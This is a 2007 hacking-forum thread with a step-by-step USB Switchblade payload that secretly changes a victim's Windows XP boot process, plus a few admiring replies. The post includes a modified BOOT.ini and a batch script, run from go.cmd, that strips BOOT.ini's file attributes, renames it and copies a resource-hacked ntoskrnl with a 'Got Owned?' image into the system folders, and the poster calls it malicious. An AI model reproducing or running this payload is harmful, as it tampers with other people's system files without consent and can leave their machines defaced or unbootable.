AndyzBong Posted March 15, 2007 Share Posted March 15, 2007 A while back I was reading root-ftw's post ownage and became interested in the idea of safely modifying the ntoskrnl boot image via the USB Switchblade. (mine is a simple "Got Owned?" image) You will need (these all go in WIPCMD): 1. a ResHacked copy of ntoskrnl (name it nt0skrnl) 2. a modified copy of BOOT.ini 3. a .bat file called nt0skrnl.bat Software you will need: 1. Adobe Photoshop, Paint Shop Pro, or similar. 2. ResHack (ResHack) 3. HexEdit (optional) First open up Adobe Photoshop or Paint Shop Pro to create your custom boot image. The image has to be a 640x480 bitmap with a 16-color palette. NOT 16-bit colors, but a 16-color palette (meaning the entire image is only made up of 16 colors). You cannot use MS Paint because it uses a 24-color palette by default. I suggest making your own boot image, rather than downloading an image from a website. If your 16-color palette is made up of custom RGB colors, you have to do some hexediting to ntoskrnl. More information about making a custom image can be found here. After you have created your image, you will need a copy of ntoskrnl to modify with ResHack. Paste a copy of ntoskrnl.exe into your WIPCMD folder and open it with ResHack. The Windows XP boot image resource is located in Bitmap : 1 : 1033. On the menu bar click Action : Replace Bitmap, select your custom image, and save your modified ntoskrnl as nt0skrnl. If you are still having trouble using ResHack and ntoskrnl, more information can be found here. Next, open notepad in WIPCMD and create a BOOT.ini file with the following code: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" /fastdetect /kernel=nt0skrnl.exe This method of delivery will be a lot safer than simply renaming the ntoskrnl file and replacing it with the modified version. Finally you will need to create a batch file named nt0skrnl.bat with the following code: @echo off ATTRIB -r -s -h C:BOOT.ini RENAME C:BOOT.ini BOOT.bak COPY /y H:WIPCMDBOOT.ini C: COPY /y H:WIPCMDnt0skrnl.exe C:WINDOWSsystem32 exit Now simply call the nt0skrnl.bat file from go.cmd and on the next reboot, your custom image will be displayed. If the computer you are doing this to has multiple partitions, or has XP installed on a drive other than C: you will need to change the code... duh. I also realize that this is "lame" and "malicious", so deal. Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted March 22, 2007 Share Posted March 22, 2007 That's sweet Quote Link to comment Share on other sites More sharing options...
Deveant Posted March 23, 2007 Share Posted March 23, 2007 hehe, i like it, will have to give it a test for sure. Quote Link to comment Share on other sites More sharing options...
unasoto Posted March 23, 2007 Share Posted March 23, 2007 me likey me likey bigtime ;) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.